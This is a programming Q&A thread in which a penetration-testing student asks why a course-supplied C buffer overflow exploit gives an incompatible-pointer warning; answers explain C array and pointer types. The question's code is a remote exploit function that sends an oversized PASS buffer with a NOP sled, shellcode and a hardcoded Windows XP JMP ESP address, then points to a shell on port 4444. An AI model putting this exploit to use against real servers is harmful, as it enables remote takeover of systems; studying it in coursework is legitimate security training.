# Assignment from Incompatible Pointer Type In C Script

Tags: c, buffer-overflow

In a course I'm taking, I was given a broken buffer overflow script written in C, and have to fix the broken coding. I've patched a few things so far, but am receiving this error message when trying to compile it (the error showed up from the initial code, not from anything I edited):

646-fixed.c: In function ‘exploit’:

646-fixed.c:48: warning: assignment from incompatible pointer type

Below is the function where the error is occurring. I'm not very familiar with C - but from the responses I received yesterday, I understand that this is happening due to ptr's type being int, & evil's type being char. What I don't understand is what I can do to fix this - can anybody help with this?
You can also [see the full script here](http://codetidy.com/6662/)

```
void exploit(int sock) {
      FILE *test;
      int *ptr;
      char userbuf[] = "USER madivan\r\n";
      char evil[3001];
      char buf[3012];
      char receive[1024];
      char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x90\x90\x90\x90\x90\x90\x90\x90";
      memset(buf, 0x00, 3012);
      memset(evil, 0x00, 3001);
      memset(evil, 0x43, 3000);
48    ptr = &evil;
      ptr = ptr + 652; // 2608 
      memcpy(ptr, &nopsled, 16);
      ptr = ptr + 4;
      memcpy(ptr, &shellcode, 317);
      *(long*)&evil[2600] = 0x7CB41010; // JMP ESP XP 7CB41020 FFE4 JMP ESP

      // banner
      recv(sock, receive, 200, 0);
      printf("[+] %s", receive);
      // user
      printf("[+] Sending Username...\n");
      send(sock, userbuf, strlen(userbuf), 0);
      recv(sock, receive, 200, 0);
      printf("[+] %s", receive);
      // passwd
      printf("[+] Sending Evil buffer...\n");
      sprintf(buf, "PASS %s\r\n", evil);
      //test = fopen("test.txt", "w");
      //fprintf(test, "%s", buf);
      //fclose(test);
      send(sock, buf, strlen(buf), 0);
      printf("[*] Done! Connect to the host on port 4444...\n\n");
}
```

*Note: I posted this yesterday providing only a few lines of the code, and as a result, couldn't get a clear answer - so I deleted it and am reposting it.*

Comment: Which part of the error don't you understand?

Comment: `ptr`'s type is: `int *`
`&evil`'s type is: `char **`

Comment: @fukanchik `&evil` is `char (*)[3001];`

Comment: @juanchopanza I understand the error, but I don't understand what to do about it.

Comment: It depends on what you want the code to do.

Comment: @juanchopanza Again I'm not familiar with C, so I don't know exactly what's happening. But I think it's trying to set ptr to the value of evil in this case, just done incorrectly?

Comment: I guess you need a pointer to the first element of `evil`. I added an answer.

Comment: Answer is below, but a word of warning.  If you don't understand this problem, you are in for some pretty tough sledding by taking a course on buffer overflows and the like...  You might want to start with a C course.

Comment: @pedwards It's a penetration testing course. They specifically stated programming knowledge isn't required for it - it just falls into a few pieces of it. I've been learning the basics of several programming languages, will be adding C to that list.

Comment: @JustinLund has the offensive security course been useful to you? i am about to finish it, any recommendation?

Answer (score 5, accepted):

The type of `&evil` is pointer to length 3001 array or char, or `char (*)[3001]`. The type of `ptr` is pointer to `int`, or `int*`. Those types are incompatible. You can't assign one to the other.

What you probably need is a pointer to the first element of `evil`. You can use a pointer to `char`, i.e. `char*`, and assign `evil` to it:

```
char *ptr;
....
ptr = evil;
```

Here, `evil` decays to a pointer to the first element to the array, so the assignment works. This is equivalent to assigning the address of the first element:

```
ptr = &evil[0];
```